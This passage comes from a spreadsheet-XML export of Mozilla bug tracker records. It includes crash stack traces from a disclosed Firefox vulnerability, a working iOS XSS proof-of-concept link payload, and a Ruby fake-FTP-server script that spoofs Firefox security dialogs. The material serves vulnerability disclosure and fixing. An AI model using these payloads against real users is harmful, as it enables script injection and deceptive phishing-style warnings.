[e:\builds\moz2_slave\rel-2.0-w32-bld\build\content\events\src\nseventdispatcher.cpp
341]
0012d774 101a57d0 xul!nsEventDispatcher::Dispatch+0x484
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\content\events\src\nseventdispatcher.cpp
632]
0012d7ec 101a5997 xul!DocumentViewerImpl::LoadComplete+0x109
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\layout\base\nsdocumentviewer.cpp
1055]
0012d9d8 10095a63 xul!nsDocShell::EndPageLoad+0xbd
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\docshell\base\nsdocshell.cpp
6087]
0012da28 100c9413 xul!nsDocShell::OnStateChange+0xc5
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\docshell\base\nsdocshell.cpp
5938]
0012da6c 10024d53 xul!nsDocLoader::FireOnStateChange+0x133
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\uriloader\base\nsdocloader.cpp
1334]
0012da80 10195e5b xul!nsDocLoader::doStopDocumentLoad+0x1c
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\uriloader\base\nsdocloader.cpp
953]
00000000 00000000 xul!nsDocLoader::DocLoaderIsEmpty+0x1cb
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\uriloader\base\nsdocloader.cpp
@ 820]
With heap spray removed:
eax=06860800 ebx=00000000 ecx=06913300 edx=41414141 esi=06913300
edi=07f7a7c0
eip=1043781c esp=0012cbb4 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
xul!nsINode::ReplaceOrInsertBefore+0x39820c:
1043781c 8b4244 mov eax,dword ptr [edx+44h] ds:0023:41414185=????????
0:000&gt; k
ChildEBP RetAddr
0012cbdc 1010ca1a xul!nsINode::ReplaceOrInsertBefore+0x39820c
0012cc48 1055eb86 xul!nsCOMPtr_base::assign_from_qi+0x2a
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\obj-firefox\xpcom\build\nscomptr.cpp
98]
0012cc50 1057a744
xul!nsCOMPtr&lt;nsIDOMHTMLOptionElement&gt;::nsCOMPtr&lt;nsIDOMHTMLOptionElement&gt;+0x18
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\obj-firefox\dist\include\nscomptr.h
596]
0012cc74 10962eb5 xul!nsHTMLOptionCollection::Add+0x8c
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\content\html\content\src\nshtmlselectelement.cpp
2286]
0012ccac 01695221 xul!nsIDOMNSHTMLOptionCollection_Add+0xf2
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\obj-firefox\js\src\xpconnect\src\dom_quickstubs.cpp
20899]
0012d288 0168cb31 mozjs!js::Interpret+0x6331
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\js\src\jsinterp.cpp 4801]
0012d2bc 0168cf51 mozjs!js::RunScript+0xb1
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\js\src\jsinterp.cpp 653]
0012d314 0168d72c mozjs!js::Invoke+0x3b1
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\js\src\jsinterp.cpp 740]
0012d350 0164d4cf mozjs!js::ExternalInvoke+0x1dc
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\js\src\jsinterp.cpp 863]
0012d384 10176229 mozjs!JS_CallFunctionValue+0x4f
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\js\src\jsapi.cpp 5174]
0012d44c 10192a2b xul!nsJSContext::CallEventHandler+0x2b9
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\dom\base\nsjsenvironment.cpp
1915]
0012d548 101a4ca2 xul!nsJSEventListener::HandleEvent+0x11b
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\dom\src\events\nsjseventlistener.cpp
230]
0012d634 1013acbe xul!nsEventListenerManager::HandleEventSubType+0x36
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\content\events\src\nseventlistenermanager.cpp
1127]
0012d688 10125c72
xul!nsEventListenerManager::HandleEventInternal+0x2ce
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\content\events\src\nseventlistenermanager.cpp
1224]
0012d6d4 1010ad14
xul!nsEventTargetChainItem::HandleEventTargetChain+0x2d2
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\content\events\src\nseventdispatcher.cpp
341]
0012d774 101a57d0 xul!nsEventDispatcher::Dispatch+0x484
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\content\events\src\nseventdispatcher.cpp
632]
0012d7ec 101a5997 xul!DocumentViewerImpl::LoadComplete+0x109
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\layout\base\nsdocumentviewer.cpp
1055]
0012d9d8 10095a63 xul!nsDocShell::EndPageLoad+0xbd
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\docshell\base\nsdocshell.cpp
6087]
0012da28 100c9413 xul!nsDocShell::OnStateChange+0xc5
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\docshell\base\nsdocshell.cpp
5938]
0012da6c 10024d53 xul!nsDocLoader::FireOnStateChange+0x133
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\uriloader\base\nsdocloader.cpp
1334]
0012da80 10195e5b xul!nsDocLoader::doStopDocumentLoad+0x1c
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\uriloader\base\nsdocloader.cpp
953]
00000000 00000000 xul!nsDocLoader::DocLoaderIsEmpty+0x1cb
[e:\builds\moz2_slave\rel-2.0-w32-bld\build\uriloader\base\nsdocloader.cpp
@ 820]
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   regenrecht
-- FURTHER DETAILS ------------------------------
If supporting files were contained with this report they are provided
within a password protected ZIP file. The password is the ZDI
candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.
Please confirm receipt of this report. We expect all vendors to
remediate ZDI vulnerabilities within 180 days of the reported date. If
you are ready to release a patch at any point leading up the the
deadline please coordinate with us so that we may release our advisory
detailing the issue. If the 180 day deadline is reached and no patch
has been made available we will release a limited public advisory with
our own mitigations so that the public can protect themselves in the
absence of a patch. Please keep us updated regarding the status of
this issue and feel free to contact us at any time:
Derek Brown
Security Liaison
Zero Day Initiative
zdi-disclosures@tippingpoint.com
The PGP key used for all ZDI vendor communications is available from:
     http://www.zerodayinitiative.com/documents/zdi-pgp-key.asc
-- INFORMATION ABOUT THE ZDI ---------------------
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for
responsibly disclosing discovered vulnerabilities.
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until an
official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Please contact us for further information or refer to:
    http://www.zerodayinitiative.com
-- DISCLOSURE POLICY ----------------------------
Our vulnerability disclosure policy is available online at:
    http://www.zerodayinitiative.com/advisories/disclosure_policy/</t>
        </is>
      </c>
      <c r="X1719" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1720">
      <c r="A1720" t="n">
        <v>437142</v>
      </c>
      <c r="B1720" t="inlineStr">
        <is>
          <t>2008-06-03 16:47:43 -0700</t>
        </is>
      </c>
      <c r="C1720" t="inlineStr">
        <is>
          <t>[FIX]Crash [@ nsStyleContext::Destroy] with image map, MathML</t>
        </is>
      </c>
      <c r="D1720" t="inlineStr">
        <is>
          <t>2012-12-25 14:14:44 -0800</t>
        </is>
      </c>
      <c r="E1720" t="n">
        <v>1</v>
      </c>
      <c r="F1720" t="n">
        <v>1</v>
      </c>
      <c r="G1720" t="n">
        <v>3</v>
      </c>
      <c r="H1720" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1720" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1720" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1720" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1720" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1720" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1720" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1720" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1720" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q1720" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1720" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1720" t="inlineStr">
        <is>
          <t>mozilla1.9.1b2</t>
        </is>
      </c>
      <c r="T1720" t="n">
        <v>1</v>
      </c>
      <c r="U1720" t="n">
        <v>0</v>
      </c>
      <c r="V1720" t="n">
        <v>30</v>
      </c>
      <c r="W1720" t="inlineStr">
        <is>
          <t>Created attachment 323634
testcase
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1a1pre) Gecko/2008053113 Minefield/3.1a1pre
Steps to reproduce:
1. Load the testcase.
2. Reload or close the window (but don't navigate to another page first!).
Result: crash [@ nsStyleContext::Destroy] calling 0xdddddddd.</t>
        </is>
      </c>
      <c r="X1720" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1721">
      <c r="A1721" t="n">
        <v>934016</v>
      </c>
      <c r="B1721" t="inlineStr">
        <is>
          <t>2013-11-01 16:38:21 -0700</t>
        </is>
      </c>
      <c r="C1721" t="inlineStr">
        <is>
          <t>Null_Cipher (used during handshake) does not respect maxOutputLen, copying an attacker-supplied # of bytes</t>
        </is>
      </c>
      <c r="D1721" t="inlineStr">
        <is>
          <t>2015-02-25 20:16:48 -0800</t>
        </is>
      </c>
      <c r="E1721" t="n">
        <v>1</v>
      </c>
      <c r="F1721" t="n">
        <v>1</v>
      </c>
      <c r="G1721" t="n">
        <v>3</v>
      </c>
      <c r="H1721" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1721" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1721" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1721" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L1721" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1721" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1721" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1721" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1721" t="inlineStr"/>
      <c r="Q1721" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1721" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1721" t="inlineStr">
        <is>
          <t>3.15.3</t>
        </is>
      </c>
      <c r="T1721" t="n">
        <v>1</v>
      </c>
      <c r="U1721" t="n">
        <v>0</v>
      </c>
      <c r="V1721" t="n">
        <v>35</v>
      </c>
      <c r="W1721" t="inlineStr">
        <is>
          <t>The implementation of Null_Cipher uses PORT_Mempcy to copy data from the input buffer to the output buffer, as seen at http://mxr.mozilla.org/nss/source/lib/ssl/ssl3con.c#819
However, it does not validate or cap inputLen to be &lt;= maxOutputLen. As a result, an attacker that sends a malformed SSL record may overwrite memory, including potentially memory on the stack.</t>
        </is>
      </c>
      <c r="X1721" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1722">
      <c r="A1722" t="n">
        <v>784730</v>
      </c>
      <c r="B1722" t="inlineStr">
        <is>
          <t>2012-08-22 10:59:24 -0700</t>
        </is>
      </c>
      <c r="C1722" t="inlineStr">
        <is>
          <t>"ASSERTION: wrapper already in new scope" with canvas, adoptNode</t>
        </is>
      </c>
      <c r="D1722" t="inlineStr">
        <is>
          <t>2013-11-25 13:27:02 -0800</t>
        </is>
      </c>
      <c r="E1722" t="n">
        <v>1</v>
      </c>
      <c r="F1722" t="n">
        <v>1</v>
      </c>
      <c r="G1722" t="n">
        <v>3</v>
      </c>
      <c r="H1722" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1722" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1722" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K1722" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1722" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1722" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1722" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1722" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1722" t="inlineStr">
        <is>
          <t>[adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q1722" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1722" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1722" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T1722" t="n">
        <v>1</v>
      </c>
      <c r="U1722" t="n">
        <v>0</v>
      </c>
      <c r="V1722" t="n">
        <v>45</v>
      </c>
      <c r="W1722" t="inlineStr">
        <is>
          <t>Created attachment 654266
testcase
With:
  user_pref("gfx.canvas.azure.enabled", false);
The testcase triggers:
###!!! ASSERTION: wrapper already in new scope!: '!newMap-&gt;Find(wrapper-&gt;GetIdentityObject())', file js/xpconnect/src/XPCWrappedNative.cpp, line 1651</t>
        </is>
      </c>
      <c r="X1722" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1723">
      <c r="A1723" t="n">
        <v>1383070</v>
      </c>
      <c r="B1723" t="inlineStr">
        <is>
          <t>2017-07-21 07:48:28 -0700</t>
        </is>
      </c>
      <c r="C1723" t="inlineStr">
        <is>
          <t>Intermittent browser_onboarding_notification_3,browser_onboarding_notification_4.js,browser_onboarding_tours{,et}.js | Uncaught exception - Should load onboarding overlay - timed out after 50 tries.</t>
        </is>
      </c>
      <c r="D1723" t="inlineStr">
        <is>
          <t>2017-08-27 19:03:01 -0700</t>
        </is>
      </c>
      <c r="E1723" t="n">
        <v>1</v>
      </c>
      <c r="F1723" t="n">
        <v>1</v>
      </c>
      <c r="G1723" t="n">
        <v>2</v>
      </c>
      <c r="H1723" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1723" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1723" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K1723" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1723" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1723" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1723" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1723" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1723" t="inlineStr">
        <is>
          <t>[photon-onboarding][stockwell fixed:timing]</t>
        </is>
      </c>
      <c r="Q1723" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1723" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1723" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T1723" t="n">
        <v>1</v>
      </c>
      <c r="U1723" t="n">
        <v>0</v>
      </c>
      <c r="V1723" t="n">
        <v>41</v>
      </c>
      <c r="W1723" t="inlineStr">
        <is>
          <t>Filed by: rvandermeulen [at] mozilla.com
https://treeherder.mozilla.org/logviewer.html#?job_id=116374711&amp;repo=mozilla-central
https://queue.taskcluster.net/v1/task/I9ptZ3s-TrO-7w_Uk5YDlw/runs/0/artifacts/public/logs/live_backing.log</t>
        </is>
      </c>
      <c r="X1723" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1724">
      <c r="A1724" t="n">
        <v>1631739</v>
      </c>
      <c r="B1724" t="inlineStr">
        <is>
          <t>2020-04-21 03:45:26 -0700</t>
        </is>
      </c>
      <c r="C1724" t="inlineStr">
        <is>
          <t>XSS from booby-trapped link on Firefox iOS Download Link Action</t>
        </is>
      </c>
      <c r="D1724" t="inlineStr">
        <is>
          <t>2024-05-30 10:13:44 -0700</t>
        </is>
      </c>
      <c r="E1724" t="n">
        <v>1</v>
      </c>
      <c r="F1724" t="n">
        <v>1</v>
      </c>
      <c r="G1724" t="n">
        <v>2</v>
      </c>
      <c r="H1724" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1724" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1724" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1724" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1724" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1724" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1724" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1724" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1724" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [user interaction keeps it from being sec-high]</t>
        </is>
      </c>
      <c r="Q1724" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1724" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1724" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1724" t="n">
        <v>0</v>
      </c>
      <c r="U1724" t="n">
        <v>0</v>
      </c>
      <c r="V1724" t="n">
        <v>10</v>
      </c>
      <c r="W1724" t="inlineStr">
        <is>
          <t>Created attachment 9142011
firefox-ios.html
Firefox Version: v24.1
OS: iOS 13.3.1
Issue: Universal XSS on Firefox iOS Download link Action
Description:
Firefox iOS user clicks download link in hyperlink option and XSS is triggered on current url, When the hyperlink is in format https://anydomain/','123');alert(document.domain);//
Sample attack scenerio 
* Attacker links https://attacker.com/','123');alert( in google.com index
* Victim click's download link on firefox iOS
* XSS is executed on victim's google.com domain
Steps to reproduce:
1. Open https://vinothkumar.tech/firefox-ios your iOS firefox browser.
2. Hold the link until preview popup appears.
3. Click Download Link
4. XSS is triggered
Root Cause: 
https://github.com/mozilla-mobile/firefox-ios/blob/v24.1/Client/Frontend/Browser/BrowserViewController/BrowserViewController+WebViewDelegates.swift#L171
Unescaped url link is being appeneded to the javascript when download action clicked
```
currentTab.webView?.evaluateJavaScript("window.__firefox__.download('\(url.absoluteString)', '\(UserScriptManager.securityToken)')")
```
Fix:
```
let safeUrl = url.absoluteString.replacingOccurrences(of: "'", with: "%27")
currentTab.webView?.evaluateJavaScript("window.__firefox__.download('\(safeUrl)', '\(UserScriptManager.securityToken)')")
```
Youtube Unlisted Video: https://youtu.be/zkVVolyCrt0
POC:
&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;title&gt;Firefox Universal Download Link XSS POC&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;a href="http://vinothsparrow.herokuapp.com/','123');alert(document.domain);//"&gt;Download Link in Firefox&lt;/a&gt;&lt;br&gt;&lt;br&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
        </is>
      </c>
      <c r="X1724" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1725">
      <c r="A1725" t="n">
        <v>605339</v>
      </c>
      <c r="B1725" t="inlineStr">
        <is>
          <t>2010-10-18 17:10:23 -0700</t>
        </is>
      </c>
      <c r="C1725" t="inlineStr">
        <is>
          <t>jetpack suite can't run without UnpackTests() to unzip the jetpack test dir</t>
        </is>
      </c>
      <c r="D1725" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1725" t="n">
        <v>1</v>
      </c>
      <c r="F1725" t="n">
        <v>1</v>
      </c>
      <c r="G1725" t="n">
        <v>5</v>
      </c>
      <c r="H1725" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1725" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1725" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1725" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1725" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1725" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1725" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1725" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1725" t="inlineStr"/>
      <c r="Q1725" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1725" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1725" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1725" t="n">
        <v>1</v>
      </c>
      <c r="U1725" t="n">
        <v>0</v>
      </c>
      <c r="V1725" t="n">
        <v>3</v>
      </c>
      <c r="W1725" t="inlineStr">
        <is>
          <t>Created attachment 484175
[tested] add UnpackTest() step to jetpack suite, also small naming fix for other UnpackTest() calls
Length of time spent on jetpack suite led to missing the addition of a new custom per-test UnpackTests() which makes it so that jetpack suite cannot locate the jetpack dir in order to run the suite.
Attached a patch, will run in staging quickly and make sure it works properly.</t>
        </is>
      </c>
      <c r="X1725" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1726">
      <c r="A1726" t="n">
        <v>1282430</v>
      </c>
      <c r="B1726" t="inlineStr">
        <is>
          <t>2016-06-27 06:51:20 -0700</t>
        </is>
      </c>
      <c r="C1726" t="inlineStr">
        <is>
          <t>cross-domain 'alert-style' modal dialog spoof using ftp even from e.g. img requests in web forums or the like</t>
        </is>
      </c>
      <c r="D1726" t="inlineStr">
        <is>
          <t>2024-02-08 20:07:50 -0800</t>
        </is>
      </c>
      <c r="E1726" t="n">
        <v>1</v>
      </c>
      <c r="F1726" t="n">
        <v>1</v>
      </c>
      <c r="G1726" t="n">
        <v>6</v>
      </c>
      <c r="H1726" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1726" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1726" t="inlineStr">
        <is>
          <t>Networking: FTP</t>
        </is>
      </c>
      <c r="K1726" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1726" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1726" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1726" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1726" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1726" t="inlineStr">
        <is>
          <t>[necko-backlog][adv-main66+]</t>
        </is>
      </c>
      <c r="Q1726" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1726" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1726" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T1726" t="n">
        <v>1</v>
      </c>
      <c r="U1726" t="n">
        <v>0</v>
      </c>
      <c r="V1726" t="n">
        <v>11</v>
      </c>
      <c r="W1726" t="inlineStr">
        <is>
          <t>Created attachment 8765453
exploit.rb
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/50.0.2661.102 Chrome/50.0.2661.102 Safari/537.36
Steps to reproduce:
tested with (system base): windows, linux
tested with (version): mozilla firefox 43.0.2, 47.0
proof of concept:
1. (browser) open a ftp connection using ftp-link on img-tag or anything: &lt;img src='ftp://username:password@server/test.png'&gt;
2. (browser) send wrong login credentials.
3. (server) 
4. (server) break connection by server side and send a fake message.
screenshot: http://fs5.directupload.net/images/160105/u7mlcf54.jpg
test-exploit (ruby):
require 'timeout'
require 'socket'
#---conf---
addr='127.0.0.1' #serverip
port=21 #serverport
$sleeper=0.3 #wait before broke connection
$threads=30 #concurrent connections
$killcom='k1llm3' #kill server by command
$msgbox="ACHTUNG: Diese Website enth\xE4lt Malware!\x0A\x0ASelbst wenn der Besuch dieser Website bisher sicher war,\x0Abesteht nun die Gefahr, dass Sie Ihren Computer mit Malware\x0Ainfizieren\x0A\x0A***Malware ist Schadsoftware, die unter anderem zu\x0AIdentit\xE4tsdiebstahl, finanziellen Verlusten und zum dauerhaften\x0AL\xF6schen von Dateien f\xFChren kann.***\x0A\x0ABITTE VERLASSEN SIE DIESE WEBSITE UMGEHEND!\x0A\x0A*---Ihr Mozilla Firefox-Team"
#----------
$msga="220 Speak friend, and enter\r\n"; $msgb="331 FTP login okay, send password.\r\n"; $server=TCPServer.open(addr, port)
def main(client)
while 1
sleep 0.000001
while client=='x'
sleep 0.000001; client=$server.accept; puts "("+Time.at(Time.now.to_i).to_s+") "+client.peeraddr[3]
end
begin
complete_results=Timeout.timeout(5) do
sleep $sleeper; client.send($msga, 0); linei=0
while line=client.gets
if line==$killcom+"\r\n" or line==$killcom+"\n"
exit
end
sleep 0.000001
client.send($msgb+$msgbox+"\r\n", 0); sleep $sleeper; client.close; client='x'; break
end
end
rescue Timeout::Error
end
end
end
i=1
while i&lt;$threads
Thread.new{main('x')}
i+=1
end
Thread.new{main('x')}.join
Actual results:
screenshot: http://fs5.directupload.net/images/160105/u7mlcf54.jpg
by using this exploit/this way: firefox will not say what kind of error show this message. the user only see a message directly from firefox. attackers can foist this object each where include img-tags or anything like forums, blog-comments, etc...
Expected results:
it's a fine way to spreading trojans and spoofing security messages on friendly websites.</t>
        </is>
      </c>
      <c r="X1726" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1727">
      <c r="A1727" t="n">
        <v>7442</v>
      </c>
      <c r="B1727" t="inlineStr">
        <is>
          <t>1999-06-01 17:53:52 -0700</t>
        </is>
      </c>
      <c r="C1727" t="inlineStr">
        <is>
          <t>[CRASH] Combo boxes crashing big time</t>
        </is>
      </c>
      <c r="D1727" t="inlineStr">
        <is>
          <t>1999-06-15 11:16:31 -0700</t>
        </is>
      </c>
      <c r="E1727" t="n">
        <v>1</v>
      </c>
      <c r="F1727" t="n">
        <v>1</v>
      </c>
      <c r="G1727" t="n">
        <v>3</v>
      </c>
      <c r="H1727" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1727" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1727" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K1727" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1727" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1727" t="inlineStr">
        <is>
          <t>Windows 95</t>
        </is>
      </c>
      <c r="N1727" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1727" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1727" t="inlineStr"/>
      <c r="Q1727" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1727" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1727" t="inlineStr">
        <is>
          <t>M7</t>
        </is>
      </c>
      <c r="T1727" t="n">
        <v>1</v>
      </c>
      <c r="U1727" t="n">
        <v>0</v>
      </c>
      <c r="V1727" t="n">
        <v>8</v>
      </c>
      <c r="W1727" t="inlineStr">
        <is>
          <t>Select a combo box and then do anything.  First discovered when I selected a
combo box and then tried to click away.  This caused both Apprunner and Explorer
to crash (not IE, and not Windows Explorer, just plain Explorer).  When I tried
to select a combo box and then select an item from within, I generated the blue
screen of death.
I'm running 1999060108.</t>
        </is>
      </c>
      <c r="X1727" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1728">
      <c r="A1728" t="n">
        <v>518675</v>
      </c>
      <c r="B1728" t="inlineStr">
        <is>
          <t>2009-09-24 14:31:55 -0700</t>
        </is>
      </c>
      <c r="C1728" t="inlineStr">
        <is>
          <t>JSAutoTempValueRooter(...) is bad mojo</t>
        </is>
      </c>
      <c r="D1728" t="inlineStr">
        <is>
          <t>2009-11-09 18:36:47 -0800</t>
        </is>
      </c>
      <c r="E1728" t="n">
        <v>1</v>
      </c>
      <c r="F1728" t="n">
        <v>1</v>
      </c>
      <c r="G1728" t="n">
        <v>3</v>
      </c>
      <c r="H1728" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1728" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1728" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1728" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
